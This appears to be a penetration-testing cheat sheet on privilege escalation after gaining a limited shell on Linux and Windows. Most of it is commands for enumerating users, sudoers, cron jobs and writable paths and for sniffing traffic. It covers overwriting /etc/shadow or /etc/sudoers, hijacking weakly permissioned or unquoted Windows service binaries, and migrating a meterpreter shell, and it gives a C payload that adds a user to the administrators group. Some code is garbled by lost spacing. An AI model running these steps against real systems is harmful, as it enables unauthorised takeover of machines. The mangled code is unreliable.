Devil is in the detail. He literally is , not kidding . Once limited shell is established on the system its a good idea to escalate privileges . Because why wont you ?
Its a good idea to get to know the system we are working with first .
ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/
Check what jobs are scheduled
1 2 3 4 5 6 7 8 9 10 11 12
crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
Try to listen to live traffic
1
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
Self exploration
1 2 3 4 5 6 7 8 9
id who w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'# List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l
Find Suid , Guid misconfiguration and exploit
When a binary has an suid bit attached to it , it runs an another user which could be root if root’s the owner .
Im case we have a restricted shell that has access to some programs using sudo we might be able to escalate your privileges with. Any program that can write or overwrite can be used. For example, if we have sudo-rights to cp you can overwrite /etc/shadow or /etc/sudoers with your own malicious file.
check for any such available binaries and again refer the amazing GTFOBins
World writable scripts onwed by root
If you find a script that is owned by root but is writable by anyone you can add your own malicious code in that script that will escalate your privileges when the script is run as root. It might be part of a cronjob, or otherwise automatized, or it might be run by hand by a sysadmin. You can also check scripts that are called by these scripts.
1 2 3 4 5 6 7 8 9 10
#World writable files directories find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null
# World executable folder find / -perm -o x -type d 2>/dev/null
# World writable and executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
Services on windows are programs that run in the background. Without a GUI. If you find a service that has write permissions set to everyone you can change that binary into your custom binary and make it execute in the privileged context. First we need to find services. That can be done using wmci or sc.exe. Wmci is not available on all windows machines, and it might not be available to your user. If you don’t have access to it, you can use sc.exe.
WMCI
1
wmic service list brief
This will produce a lot out output and we need to know which one of all of these services have weak permissions. In order to check that we can use the icacls program. Notice that icacls is only available from Vista and up. XP and lower has cacls instead. As you can see in the command below you need to make sure that you have access to wimc, icacls and write privilege in C:\windows\temp.
1 2 3
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.
sc.exe
1 2 3 4 5 6 7 8
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DOecho %i type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Now you can process them one by one with the cacls command.
1
cacls "C:\path\to\file.exe"
What we are interested in is binaries that have been installed by the user. In the output you want to look for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.
Example:
1 2 3 4 5
C:\path\to\file.exe BUILTIN\Users:F BUILTIN\Power Users:C BUILTIN\Administrators:F NT AUTHORITY\SYSTEM:F
That means your user has write access. So you can just rename the .exe file and then add your own malicious binary. And then restart the program and your binary will be executed instead. This can be a simple getsuid program or a reverse shell that you create with msfvenom. Here is a POC code for getsuid.
1 2 3 4 5 6 7
#include<stdlib.h> intmain() { int i; i = system("net localgroup administrators theusername /add"); return0; }
wmic service NAMEOFSERVICE call startservice net stop [servicename] && net start [servicename].
The binary should now be executed in the SYSTEM or Administrator context.
MIgrate the meterpreter shell
If your meterpreter session dies right after you get it you need migrate it to a more stable service. A common service to migrate to is winlogon.exe since it is run by system and it is always run. You can find the PID like this:
1
wmic process list brief | find "winlogon"
So when you get the shell you can either type migrate PID or automate this so that meterpreter automatically migrates. Here for more information
Find and exploit unquoted service paths
If the path contains a space and is not quoted, the service is vulnerable.
Find services with Unquoted paths
1 2 3 4 5 6 7 8
# Using WMIC wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ # Using sc sc query sc qc service name # Look for Binary_path_name and see if it is unquoted.
exploit it
If the path to the binary is:
1
c:\Program Files\something\winamp.exe
We can place a binary like this
1
c:\program.exe
When the program is restarted it will execute the binary program.exe, which we of course control. We can do this in any directory that has a space in its name. Not only program files.
There is also a metasploit module for this is: exploit/windows/local/trusted_service_path